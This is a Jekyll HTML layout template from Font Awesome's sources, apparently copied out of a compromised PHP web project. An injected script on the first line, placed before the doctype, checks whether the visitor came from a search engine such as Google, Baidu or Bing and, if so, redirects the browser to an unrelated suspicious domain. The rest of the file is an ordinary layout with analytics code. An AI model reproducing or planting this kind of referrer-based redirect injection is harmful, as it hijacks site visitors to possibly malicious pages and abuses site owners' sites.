d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\_layouts\survey.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002: <html lang="en">
003: <head>
004:   <!-- Basic Page Needs
005: ================================================== -->

006:   <meta charset="utf-8" />
007:   <meta name="viewport" content="width=device-width,initial-scale=1">
008:   <meta name="description" content="Font Awesome, the iconic font and CSS framework">
009:   <meta name="author" content="Dave Gandy">
010:   <meta http-equiv="X-UA-Compatible" content="IE=edge">
011:   <link rel="shortcut icon" href="{{ page.relative_path }}assets/ico/favicon.ico">
012:
013:   <title>{% if page.title %}{{ page.title }}{% endif %}</title>
014:
015:   <style type="text/css">
016:     html{
017:       margin: 0;
018:       height: 100%;
019:       overflow: hidden;
020:     }
021:     iframe{
022:       position: absolute;
023:       left:0;
024:       right:0;
025:       bottom:0;
026:       top:0;
027:       border:0;
028:     }
029:   </style>
030:
031:   <script>
032:     var _gaq = _gaq || [];
033:     _gaq.push(['_setAccount', 'UA-30136587-1']);
034:     _gaq.push(['_trackPageview']);
035:
036:     (function() {
037:       var ga = document.createElement('script');
038:       ga.src = 'https://www.google-analytics.com/ga.js';
039:       var s = document.scripts[0];
040:       s.parentNode.insertBefore(ga, s);
041:     })();
042:   </script>
043: </head>
044: <body>
045:   {{content}}
046: </body>
047: </html>
048:
049:
050: